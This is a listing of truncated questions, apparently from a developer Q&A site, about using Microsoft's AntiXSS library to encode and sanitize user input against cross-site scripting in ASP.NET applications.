Using Microsoft's AntiXssLibrary, how do you handle input that needs to be edited later? For example: User enters: <i>title</i> Saved to the database as: <i>title</i> On an edit page, in a text box it displays something like: <i>title</i> because I've encoded it before displaying in the text box. User doesn'...
I realise there are several rich text editors for jQuery but I cannot find any that have an associated class that does the filtering and cleaning required to accept the input into a database. Does such a class exist? I am particularly interested for a PHP library, but .NET would be interesting too. ...
I've been using Microsoft's AntiXss Library and was wondering if there is a good reason why its JavaScriptEncode method wraps the result in single quotes? That behavior seems unconventional. ...
I've downloaded and looked at the Microsoft AntiXSS library, but I'm not 100% sure I need to use it for server controls (asp:textbox, etc). Everything is fine when I use it with a standard html control (input, etc). It looks like the output is encoded twice when I use the antixss lib on the server controls. I'm currently only using the...
I have been reading up on Anti-XSS Security Runtime Engine and it looks like a nice solution for web forms because it inspects controls via reflection and automatically encodes data where appropriate. However as I don't really use server side controls in ASP.NET MVC, it does not seem to be a viable solution for ASP.NET MVC. Is this corre...
I've just downloaded and taken a look at the new MS Anti_XSS 3.0 release. I've read through the help file, but I've found no mention of how to modify the whitelist it uses. Can items be added? Can items be removed? ...
Hello, I have a question regarding ANTIXSS implementation. If I was to read values from a textbox on a page and store it into a database directly and then read value from the database and insert it into a textbox, then is there a chance that the tag or similar could be executed in the process ? Regards, Andy ...
Good morning, everyone. I'm on a short-term contracting gig, trying to patch some vulnerabilities in their legacy code. The application I'm working on is a combination of Classic ASP(VBScript) and .Net 2.0 (C#). One of the tools they have purchased is Fortify 360. Let's say that this is a current classic ASP page in the application...
I just ran across a question with an answer suggesting the AntiXss library to avoid cross site scripting. Sounded interesting, reading the msdn blog, it appears to just provide an HtmlEncode() method. But I already use HttpUtility.HtmlEncode(). Why would I want to use AntiXss.HtmlEncode over HttpUtility.HtmlEncode? Indeed, I am not the...
Hello, We are looking at using a library to help us detect SQL injections. We are using sprocs and parametrized statements, but for the sake of this post that we are only using some sore of library that detects/ verifies user input. Whats the best one? Easiest to implement? Easiest to update/manage? Why prefer one over the othe...
When you can simply encode the data using HttpUtility.HtmlEncode, why should we use AntiXss.HtmlEncode? Why is white list approach better than black listing? Also, in the Anti XSS library, where do I specify the whitelist? ...
In the intent of preventing XSS attacks, I am updating a page in which we have a textbox that accepts HTML, stores it in a database and retrieves and renders it at a later time. My understanding is that I can sanitize the HTML using AntiXSS.GetSafeHtmlFragment() method. As long as I do this before storing the HTML in the database, am I ...
I am attempting to find the optimal method of guarding against Cross Site Scripting in my ASP.NET MVC application. I planned to use Microsoft’s AntiXSS library and essentially guard on two levels: 1) Protect regular textboxes (i.e. those that should only contain plain text and 2) Protect rich text boxes which can generate HTML. The libra...
I have an editor that lets users add HTML that is stored in the database and rendered on a web page. Since this is untrusted input, I plan to use Microsoft.Security.Application.AntiXsSS.GetSafeHtmlFragment to sanitize the HTML. Should I santiize before saving to the database or before rendering the untrusted input into the webpage? Is ...
I have a piece of JavaScript string, coming from an untrusted source, embedded inside of an onclick tag and I'm not sure what the correct way of encoding this string is. Here is a simplification of the HTML: <input type="button" onclick="alert([ENCODED STRING HERE]);" value="Click me" /> I use the Microsoft AntiXss library which c...
I'm looking at using WMD in my project instead of my existing RadEditor. I have been reading a few posts on how to store and retrieve the data, and I want to make sure I have the concept correct before proceeding. If my research is correct, here is what I should be doing. I should store the editor data twice (Once as HTML and once as...
With .net 4 there's a new <%: %> script enclosure that's like <%= %> but does an html encode. People are encouraging the use of this new syntax. My question is, does <%: %> protect against XSS better or as well as using the Microsoft Anti XSS library? A Microsoft security person once told me to never just use HTML Encode as it doesn't...
Hi All, It seems to me just using the html agility pack would work to prevent xss (parse then get innertext). Would it be repetitive to use antixss after using hap? Thanks, rod. ...
My company requires our ASP.NET code to pass a Fortify 360 scan before releasing the code. We use AntiXSS everywhere to sanitize HTML output. We also validate input. Unfortunately, they recently changed the "template" Fortify was using and now it's flagging all our AntiXSS calls as "Poor Validation". These calls are doing things like Ant...
Hi All, I have a report web page that allows you to export records shown to an excel file. I'm using AntiXss to display them on the screen but when a user opts to export to file and I go and get the records again from db will I need to use AntiXss to scrub for reporting purposes? Thanks, rod. ...